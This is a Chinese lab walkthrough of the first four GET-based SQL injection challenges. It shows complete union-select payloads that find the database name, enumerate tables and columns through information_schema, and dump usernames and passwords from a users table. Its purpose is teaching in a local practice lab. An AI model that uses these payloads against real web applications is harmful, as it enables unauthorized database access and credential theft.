当前位置: 首页 > news >正文

sql injections解题GET型前四道

基本错误,单引号字符串

  1. 打开小皮,启动Apache和MySQL
  2. 点击题目在这里插入
  3. 先?id=1#(mysql)确定搜索位置,
    地址末尾加’,确认是单引号闭合,
  4. 查询字段数,在刚刚后面空格order by 数字,页面没变说明存在
    这个就是不存在的,我们要先查询字段,因为后面union要求一一对应才显示
    ?id=1是定位,后面是具体执行语句;
  5. 爆破当前数据库名称?id=-1’ union select 1,database(),3%23
    (将id=1改为id=-1这样显示的是union的内容)不用-1页面优先显示原来结果
  6. ?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’%23

information_schema.tables:MySQL 系统表,存所有库、表信息
table_schema=‘security’:只查 security 这个库的表
group_concat():把所有表名拼接成一行,一次性全部展示
database() 是 MySQL 内置函数,不带参数,功能只有一个:
返回当前正在使用的数据库名称

7. ?id=-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘security’ and table_name=‘users’%23

information_schema.columns:存储所有数据表的字段(列)信息
column_name:字段名,用来取出 users 表里所有列
双重限制:table_schema=‘security’ 指定库,table_name=‘users’ 指定表
8. ?id=-1’ union select 1,group_concat(username,0x7c,password),3 from users%23

union select 1,xxx,3:固定 3 列,匹配页面回显位置
group_concat(字段1,0x7c,字段2)
0x7c 十六进制 = | 竖线分隔符,区分账号和密码
一次性拼接表里所有数据,全部展示在页面
from users:目标存储账号密码的数据表

第二题数字型输入

1.同上查询字段,发现仍然是3字段
上一题我们第一步确定搜索位置时候在1后面加了’,是因为我们要先一步闭合逻辑,让程序执行到我们的id=-1从而显示运行内容(在查询我们要的东西时,数据库会自己整个查询一遍,我们要把这个偷偷显示出来)数字型输入id=1后面不加东西
2. union select 1,2,3%23
3. 2改成database()来获得数据库名称security
这里只能改23,1在显示位不显示
4.查询全部表名
/id=-1 union select i,group_concat(table_name),3 from information_schema.tableswhere (注意-和最后的s)table_schema=‘security’%23

4. 字段是把上面除了table_schema其他的table全部换成column,注意information_schema.tables改后最后是columns,最后加and table_name='users;

union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘security’ and table_name=‘users’
5. ,group_concat(username),group_concat(password) from users
前面不变,select1展位id了,id也可以显示,但是这个题目没有给id的回显窗口

3单引号&括号闭合

1.前面改是?id=1’)
后面都不变(注意是schema)
?id=-1%27)union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=‘security’%20and%20table_name=‘users’%23

注意这个后面有from users

4 双引号、字符串型(带括号)

  1. 这个和第一题不一样,在运行时候
    在读取时候1后面会出现两个双引号,所以当界面显示错误时候反而证明他是双引号,出现同类时候才会结束这个语句,如果在我们输入后面加之前的#是没有用的,这个#在这里在两个双引号中间,被认为是普通语句,而不是执行语句,注意在之后的内容中,最后人要有%23来截断

  2. 查字段,3

  3. 这个是因为前面少了一个),所以
    探测时候不加)的原因
    但是因为union执行时候是严格对应的,所以union时候要加上

  4. 和前面一样,数据库名称,表名



    ?id=-1")%20union%20select%201,group_concat(username,0x7c,password),3%20from%20users%23
    可以写成和2,3题一样的,只是最后表示不太一样

http://www.jsqmd.com/news/1379856/

相关文章:

  • 如何免费解锁Cursor Pro功能:终极完整指南,告别AI编程限制
  • 怒江本地防水修缮团队汇总、防水补漏、书面质保更安心 - 聪居到家
  • Java图片处理实战:从BufferedImage到Thumbnailator,掌握核心操作与性能优化
  • 半导体智能制造实践:晶圆厂世界模型构建与落地全解析
  • 显卡驱动彻底清理指南:DDU工具深度使用与系统优化全解析
  • 深度适配DeepSeek模型:vLLM、LMDeploy与Triton推理引擎改造实战
  • 小户型扩容新思路|玉溪十空筑造模块化收纳设计,花小钱提升空间利用率 - 玉溪装修看看
  • 这家大视觉圆刀切割机制造厂口碑为何这么好? - 甄选测评官
  • 团队AI编程规范实践:从Claude Code治理看人机协同开发
  • 企业架构治理两类病:分布式单体与共享数据库
  • 金犇崃中频透热锻造炉:源头工厂技术实力测评 - 趣闻早乐评
  • XAgent Plan数据结构与AI Agent协作机制:构建具备自我修正能力的智能系统
  • 无线网络安全实战:CCMP协议深度解析与性能优化指南
  • 上网行为管理-内容审计
  • 2026企业海外推广效果差?外贸营销推广公司搭配外贸线上获客服务商优化获客路径(附带联系方式) - 选型|行业|价格|案例
  • 零基础玩转bWAPP靶场(五十一):XSS - Reflected (Login Form)
  • VMware [windows 11]
  • 2026年杭州口碑好的健身教练培训推荐,零基础入门学习去哪学? - 2027品牌AI展
  • 恒美智造气溶胶光度计性能测评:国产厂家对标进口品牌的全面解析 - 专业仪器测评品牌推荐
  • JAVA基础语法学习_多线程JUC
  • 塑料滤水板 5 家严选源头厂家优势详解 - 排水板厂家
  • 2026年防爆认证公司选购指南 5家不同类型服务商**参考 - 甄选测评官
  • GAMES101作业8:光线追踪渲染器实现详解与核心算法解析
  • 2026年国产六氟化硫气体检测仪头部品牌产品与服务全维度解析 - 趣闻早乐评
  • 衡水登报怎么办:线上办理更便捷 - luffy+2
  • 手把手教你学 Simulink—— 双三相感应电机 SVPWM 及谐波抑制仿真
  • 免费解锁Windows远程桌面多用户限制的终极指南:RDP Wrapper完整教程
  • 2026年宁波初创母婴门店专属GEO引流服务商推荐 - 甄选测评官
  • 华硕笔记本终极轻量级控制工具G-Helper:3分钟快速释放硬件潜能
  • leetcode 1710. Maximum Units on a Truck